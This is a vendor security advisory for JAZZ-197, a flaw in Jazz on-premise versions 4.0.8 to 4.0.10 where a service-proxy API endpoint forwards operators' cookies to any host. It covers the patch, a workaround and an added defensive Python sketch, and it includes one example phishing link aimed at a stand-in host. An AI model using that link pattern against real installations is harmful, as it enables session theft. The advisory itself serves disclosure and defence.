FortiDLP
FortiDLP is a cloud-native endpoint DLP and insider risk solution aimed at monitoring and preventing data theft on the endpoint, across Windows, macOS and Linux.
Anthony_E
Community Manager
Article Id 357185
Description: This article discusses JAZZ-197: Proxying HTTP requests.
Scope: FortiDLP.
Solution

Release Date:

28th May, 2019

Overview:

The Jazz API endpoint /api/v1/infrastructure/services/ proxies requests to any HTTP location specified in the URL, potentially leaking the operator's login cookies to the proxied site.

Affected Products:

  • Jazz on-premise installations since version 4.0.8 up to and including 4.0.10.

Unaffected Products:

  • Jazz Cloud, and any Jazz on-premise installation before 4.0.8 or after 4.0.11.

Resolution:

This issue has now been fixed in Jazz Infrastructure version 4.0.11.

It is strongly recommended that all on-premise installations running an affected version upgrade to the latest release as soon as possible. Releases are available to download through the support portal. Jazz Cloud customers are unaffected.

If it is not possible to upgrade, disable access to this API endpoint: create a role via the Jazz API (api/v1/roles) that does not include the CAN_RESTART_SERVICES permission, then assign this role to all operators via the LDAP configuration interface or the internal operators API.

Vulnerability Information:

JAZZ-197 allows the Jazz API endpoint /api/v1/infrastructure/services/ to proxy to any URL specified in the request path. If an authenticated and authorized Jazz operator clicks on a link of the form https://www.example.com/api/v1/infrastructure/service/phish.example.com:80, the browser's login cookies (and other HTTP headers) are forwarded to phish.example.com. This could be used from the browser to compromise the operator's account.
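As an added illustration (not FortiDLP's or Jazz Networks' code), the defensive pattern behind a fix for this class of bug: the service proxy only accepts an allowlisted upstream host and strips credential-bearing headers before forwarding. The service names and header list are constructed assumptions for the example.

```python
from urllib.parse import urlsplit

PROXY_PREFIX = "/api/v1/infrastructure/services/"

# Upstream hosts the endpoint is allowed to reach. Constructed for this
# example; a real deployment would enumerate its own internal services.
ALLOWED_SERVICES = {"scheduler.internal", "search.internal"}

# Request headers that carry the operator's credentials and must never
# leave the API server, whatever the upstream host is.
SENSITIVE_HEADERS = {"cookie", "authorization", "x-csrf-token"}


class ProxyTargetError(ValueError):
    """Raised when a proxy request must be refused rather than forwarded."""


def resolve_proxy_target(path: str) -> str:
    """Map /api/v1/infrastructure/services/<host[:port][/path]> to an upstream URL,
    refusing any host that is not an allowlisted internal service."""
    if not path.startswith(PROXY_PREFIX):
        raise ProxyTargetError("not a service proxy path")
    target = path[len(PROXY_PREFIX):]
    # Parse as a network-path reference so userinfo tricks such as
    # scheduler.internal@phish.example.com resolve to the real host.
    try:
        parsed = urlsplit("//" + target)
        host, port = parsed.hostname, parsed.port
    except ValueError as exc:  # malformed URL or non-numeric/out-of-range port
        raise ProxyTargetError(f"malformed proxy target {target!r}") from exc
    if host is None or host not in ALLOWED_SERVICES:
        raise ProxyTargetError(f"upstream host not allowed: {host!r}")
    url = f"http://{host}:{port or 80}{parsed.path or '/'}"
    return url + (f"?{parsed.query}" if parsed.query else "")


def forward_headers(incoming: dict) -> dict:
    """Copy request headers for the upstream call, dropping credential-bearing ones."""
    return {k: v for k, v in incoming.items() if k.lower() not in SENSITIVE_HEADERS}


def build_upstream_request(path: str, headers: dict) -> tuple:
    """Return (url, headers) for a safe upstream call, or raise ProxyTargetError."""
    return resolve_proxy_target(path), forward_headers(headers)
```

With both checks in place, a link pointing the proxy at an external host is refused outright, and even an allowlisted upstream never receives the operator's session cookie.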

Acknowledgments:

Issue found internally by Jazz Networks.

Disclosure Timeline:

  • 20/05/2019 Issue found internally by Jazz.
  • 20/05/2019 Root cause established.
  • 20/05/2019 Fix identified.
  • 28/05/2019 Patched Jazz Infrastructure released.
  • 28/05/2019 Vulnerability publicly disclosed.